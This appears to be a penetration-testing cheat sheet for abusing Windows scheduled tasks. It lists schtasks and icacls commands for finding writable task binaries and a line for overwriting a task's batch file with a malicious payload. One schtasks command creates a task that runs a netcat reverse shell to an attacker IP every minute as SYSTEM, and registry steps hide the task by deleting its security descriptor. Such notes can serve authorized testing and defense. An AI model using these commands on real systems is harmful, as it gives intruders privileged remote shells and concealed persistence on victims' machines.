# List scheduled tasks
#
schtasks
 
# View details about a scheduled task
#
schtasks /query /tn $TASK_NAME /fo list /v
 
# Check the permissions of an executable
#
icacls $PATH_TO_BINARY
 
# Modify the permissions (if possible/desired)
#
icacls $PATH_TO_BINARY /grant $GROUP:$PERMISSION
 
# You can overwrite files in Windows in the same way you'd do
# in Linux (however, this can cause issues with line
# endings... probably best to just use notepad.exe here
# instead)
#
echo $MALICIOUS_BINARY_AND_ARGUMENTS > $PATH_TO_BAT_TO_OVERWRITE
 
# Force a task to run (iff the current user has permission to
# do so)
#
schtasks /run /tn $TASK_NAME

If a task points to a file that you’ve obtained write access to, then that file can be altered without changing the underlying task.

It may also be possible to create your own tasks.

# Creates a task that executes a netcat reverse shell back to
# the attacker. "/sc" and "/mo" indicate that the task should
# be run every minute. "/ru" indicates that the task will run
# with SYSTEM privileges.
#
schtasks /create /sc minute /mo 1 /tn $TASK_NAME `
	/tr "$NETCAT_PATH -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" `
	/ru SYSTEM
 
# Checks to see if the task was created successfully.
#
schtasks /query /tn $TASK_NAME

Stealthy tasks

Deleting the task Security Descriptor will make the task invisible to any user in the system. Note that this requires PsExec!

1. Use PsExec64.exe -s -i regedit to open regedit with SYSTEM privileges.

2. Search in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ for the task to hide. Under the key for that task, there will be a value named SD that contains the security descriptor. Simply delete it.